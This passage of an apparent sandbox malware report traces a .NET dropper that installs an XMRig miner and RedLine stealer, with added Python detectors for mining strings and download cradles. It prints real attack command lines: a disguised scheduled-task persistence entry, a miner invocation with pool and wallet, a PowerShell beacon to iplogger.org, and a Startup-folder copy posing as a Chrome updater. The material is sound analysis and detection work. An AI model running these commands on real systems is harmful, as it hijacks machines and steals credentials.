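Attributing through the CNAME chain is what keeps whois.iana.org (and, in a real export, the S3 alias used for the payload download) from being lost when a blocklist is built from A records alone; the peers labelled "direct-ip" on non-standard ports are the ones that need a flow- or IP-based detection because no DNS-based control will ever see them.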

HTTP Request Dependency Graph

• 195.2.84.91
• 87.251.71.75:3214

Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 09:11:00
Start date: 23/02/2021
Path: C:\Users\user\Desktop\8TD8GfTtaW.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\8TD8GfTtaW.exe'
Imagebase: 0x1390000
File size: 2649312 bytes
MD5 hash: A5D3FDF55ABB54EC0B632DEE9D3459D4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

General

Start time: 09:11:14
Start date: 23/02/2021
Path: C:\Users\user\AppData\Local\nulhfhsi.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\nulhfhsi.exe'
Imagebase: 0x3b0000
File size: 4964504 bytes
MD5 hash: 70DCA411445D3B4394D9C467BF3FF994
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp, Author: Joe Security
• Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000004.00000003.395495832.0000000006A8E000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000003.395495832.0000000006A8E000.00000004.00000001.sdmp, Author: Joe Security
• Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000004.00000003.395598364.0000000006AAB000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000003.395598364.0000000006AAB000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000002.476502860.0000000004B5A000.00000004.00000001.sdmp, Author: Joe Security
• Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000004.00000002.476458617.0000000004A5A000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000002.476458617.0000000004A5A000.00000004.00000001.sdmp, Author: Joe Security
• Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000004.00000003.395324200.0000000006A7E000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000003.395324200.0000000006A7E000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 24%, Metadefender
• Detection: 66%, ReversingLabs
Reputation: low
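
The Yara hits on nulhfhsi.exe above (JoeSecurity_Xmrig and CoinMiner_Strings across several memory dumps) come from string matching over process memory, which is also what the report's "Detected Stratum mining protocol" and "Found strings related to Crypto-Mining" signatures rest on. As an added example, not code from the report or from those rules, the Python below runs the same kind of check over a memory-dump byte buffer: it extracts stratum+tcp:// and stratum+ssl:// pool URIs, looks for XMRig-style JSON config keys and well-known pool names, and, because the dropper is .NET and .NET keeps its strings as UTF-16, it also scans narrowed UTF-16LE views of the buffer at both byte alignments. SAMPLE_DUMP is a constructed buffer; the key list, pool-name list, wallet placeholder and ports in it are assumptions, except the host pool.minexmr.com, which is in the DNS table.

```python
"""Scan a memory-dump buffer for crypto-mining string artefacts (added example)."""
import re

# ASCII patterns; UTF-16LE copies are handled by narrowing the buffer below.
STRATUM_URI = re.compile(rb"stratum\+(tcp|ssl)://([A-Za-z0-9.\-]+):(\d{1,5})")
# Assumed XMRig-style config keys and pool names (constructed lists).
XMRIG_KEYS = [b'"donate-level"', b'"pools"', b'"algo"', b'"randomx"',
              b'"cpu-priority"', b'"huge-pages"']
POOL_HINTS = [b"minexmr", b"supportxmr", b"nanopool", b"hashvault",
              b"xmrpool", b"moneroocean"]


def _views(buf):
    """Yield the raw buffer plus narrowed versions of any UTF-16LE text in it,
    at both byte alignments, so wide strings hit the same byte regexes."""
    yield buf
    for off in (0, 1):
        w = buf[off:]
        if len(w) % 2:
            w = w[:-1]
        yield w.decode("utf-16-le", errors="ignore").encode("ascii", errors="ignore")


def scan_buffer(buf):
    """Collect (scheme, host, port) pool URIs, config keys and pool-name hints."""
    hits = {"stratum": set(), "xmrig_keys": set(), "pool_hints": set()}
    for view in _views(buf):
        for m in STRATUM_URI.finditer(view):
            hits["stratum"].add((m.group(1).decode(),
                                 m.group(2).decode().lower(),
                                 int(m.group(3))))
        hits["xmrig_keys"].update(k.decode().strip('"') for k in XMRIG_KEYS if k in view)
        hits["pool_hints"].update(p.decode() for p in POOL_HINTS if p in view)
    return hits


def verdict(hits):
    """Mirror the two report signatures: a stratum URI is the protocol
    detection; config keys or pool names alone are only 'mining strings'."""
    if hits["stratum"]:
        return "stratum-protocol"
    if len(hits["xmrig_keys"]) >= 2 or hits["pool_hints"]:
        return "mining-strings"
    return "clean"


def _wide(s):
    return s.encode("utf-16-le")


# Constructed sample: an ASCII JSON config fragment, then a wide string placed
# at an odd offset on purpose so the alignment handling is exercised.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b'{"autosave":true,"cpu":{"huge-pages":true,"priority":5},'
    + b'"pools":[{"algo":"rx/0","url":"stratum+tcp://pool.minexmr.com:4444",'
    + b'"user":"<wallet>"}],"donate-level":1}'
    + b"\x90" * 7
    + _wide("stratum+ssl://pool.minexmr.com:443")
    + b"\x00" * 8
)

if __name__ == "__main__":
    found = scan_buffer(SAMPLE_DUMP)
    print(sorted(found["stratum"]), sorted(found["xmrig_keys"]), verdict(found))
```

The split between "stratum-protocol" and "mining-strings" is deliberate: a pool hostname on its own turns up in benign software and in analysts' own tooling, whereas a stratum URI with a port is the miner's actual connection string and is what should drive the block or the alert. Running only the ASCII pass against a .NET dropper's memory would have missed the second URI entirely.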

General

Start time: 09:11:19
Start date: 23/02/2021
Path: C:\Users\user\AppData\Local\lxoqz3o0.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\lxoqz3o0.exe'
Imagebase: 0xf0000
File size: 2611424 bytes
MD5 hash: F0ECEFED65B00699CC2B57BF81492F56
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.498040430.00000000000F2000.00000020.00020000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 61%, ReversingLabs
Reputation: low

General

Start time: 09:11:28
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
Imagebase: 0x1000000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:11:29
Start date: 23/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:11:30
Start date: 23/02/2021
Path: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Imagebase: 0x1130000
File size: 2611424 bytes
MD5 hash: F0ECEFED65B00699CC2B57BF81492F56
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.497823578.0000000000FA9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000003.295958006.0000000001840000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 09:11:35
Start date: 23/02/2021
Path: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Imagebase: 0x7ff64cbf0000
File size: 6889640 bytes
MD5 hash: E95F766A3748042EFBF0F05D823F82B7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.310965675.000002ABFF28A000.00000004.00000001.sdmp, Author: Joe Security
• Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.502678236.000002ABFF250000.00000004.00000020.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.502678236.000002ABFF250000.00000004.00000020.sdmp, Author: Joe Security
• Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.502700687.000002ABFF257000.00000004.00000020.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.502700687.000002ABFF257000.00000004.00000020.sdmp, Author: Joe Security
Reputation: low

General

Start time: 09:11:37
Start date: 23/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.528913817.00000247A05AB000.00000004.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 09:11:40
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
Imagebase: 0xad0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:11:51
Start date: 23/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:14:08
Start date: 23/02/2021
Path: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
Wow64 process (32bit):
Commandline: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Imagebase:
File size: 6889640 bytes
MD5 hash: E95F766A3748042EFBF0F05D823F82B7
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 09:12:30
Start date: 23/02/2021
Path: C:\Users\user\AppData\Local\Temp\evs.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\evs.exe'
Imagebase: 0x400000
File size: 309398 bytes
MD5 hash: 8C373745D8604DA05314DE16F0BF7CED
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 82%, ReversingLabs
Reputation: low

General

Start time: 09:12:34
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
Imagebase: 0x1370000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:36
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\revs.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Users\user\AppData\Local\Temp\revs.exe'
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:4602592 bytes
                                                                                                                                                                                            MD5 hash:029CE2E532FE5C70D3342F978F5463D0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 24%, Metadefender, Browse
                                                                                                                                                                                            • Detection: 90%, ReversingLabs
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:35
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:35
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\hello_C# (2).exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:'hello_C# (2).exe'
                                                                                                                                                                                            Imagebase:0xcb0000
                                                                                                                                                                                            File size:3584 bytes
                                                                                                                                                                                            MD5 hash:D6B9F530E7E8DDEBEA8069A0D94AD38E
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 3%, Metadefender, Browse
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:35
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\hello_C#.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:'hello_C#.exe'
                                                                                                                                                                                            Imagebase:0x7b0000
                                                                                                                                                                                            File size:3584 bytes
                                                                                                                                                                                            MD5 hash:D6B9F530E7E8DDEBEA8069A0D94AD38E
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 3%, Metadefender, Browse
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:36
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:36
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:36
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\jo.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'jo.exe'
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:309248 bytes
                                                                                                                                                                                            MD5 hash:28E49F705BFD5A6785391BAC1C0E3359
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 79%, ReversingLabs

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:37
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                                                                                                                                                                                            Imagebase:0xe40000
                                                                                                                                                                                            File size:430592 bytes
                                                                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:12:58
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                                            Imagebase:0x7ff690170000
                                                                                                                                                                                            File size:823560 bytes
                                                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:13:00
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6064 CREDAT:17410 /prefetch:2
                                                                                                                                                                                            Imagebase:0xfc0000
                                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
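The process records above already contain the three facts a responder cares about: the cmd.exe chain launches the dropped executables and then a PowerShell Invoke-WebRequest to iplogger.org (a visit beacon), and revs.exe reappears byte-for-byte (same MD5 029CE2E532FE5C70D3342F978F5463D0) as 'Chrome updater.exe' in the user's Startup folder. The Python below is an added example and is not part of the Joe Sandbox report: it parses a constructed subset of these records, kept in the report's own key:value layout, and flags Startup-folder persistence, download cradles with their URLs, and one hash seen under several paths. The heuristics, regexes and function names are my own assumptions, not anything the sandbox provides.

```python
import re
from collections import defaultdict

# Constructed sample input: a subset of the per-process "General" records from
# the report, copied in the report's own key:value layout (values are the
# page's; the selection is trimmed to what the checks below need).
SAMPLE_REPORT = r"""
General

Start time:09:12:34
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D

General

Start time:09:12:36
Path:C:\Users\user\AppData\Local\Temp\revs.exe
Commandline:'C:\Users\user\AppData\Local\Temp\revs.exe'
MD5 hash:029CE2E532FE5C70D3342F978F5463D0

General

Start time:09:12:37
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10

General

Start time:09:13:02
Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe
Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe'
MD5 hash:029CE2E532FE5C70D3342F978F5463D0
"""

# PowerShell download cradles worth flagging on a command line (heuristic list, my own assumption).
DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+")
# Per-user Startup folder marker; anything launched from here survives a reboot.
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def parse_records(text):
    """Split the report text into one dict per 'General' block (key -> value)."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "General":
            current = {}
            records.append(current)
        elif current is not None and ":" in line:
            key, value = line.split(":", 1)  # values such as 09:12:34 keep their own colons
            current[key.strip()] = value.strip()
    return records


def triage(records):
    """Return (finding, details...) tuples for the three behaviours visible in this report."""
    findings = []
    paths_by_md5 = defaultdict(set)
    for rec in records:
        path = rec.get("Path", "")
        cmd = rec.get("Commandline", "")
        md5 = rec.get("MD5 hash", "").upper()
        if md5:
            paths_by_md5[md5].add(path)
        # 1. Execution out of the Startup folder is persistence.
        if STARTUP_DIR in path.lower():
            findings.append(("startup_persistence", path))
        # 2. A download cradle on the command line; keep the URL(s) for blocking and pivoting.
        if DOWNLOAD_CRADLE.search(cmd):
            findings.append(("download_cradle", path, tuple(URL_RE.findall(cmd))))
    # 3. One hash under several paths: a dropped file copied to a new name or location.
    for md5, paths in paths_by_md5.items():
        if len(paths) > 1:
            findings.append(("same_hash_multiple_paths", md5, tuple(sorted(paths))))
    return findings


if __name__ == "__main__":
    for finding in triage(parse_records(SAMPLE_REPORT)):
        print(*finding, sep="  ")
```

Run against the full report text the same parser picks up every process record; the hash correlation is what ties the Temp-folder dropper to its Startup-folder copy even though the file name changed, and the URL list is the indicator to block at the proxy.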

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:13:02
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe'
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:4602592 bytes
                                                                                                                                                                                            MD5 hash:029CE2E532FE5C70D3342F978F5463D0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Code Analysis
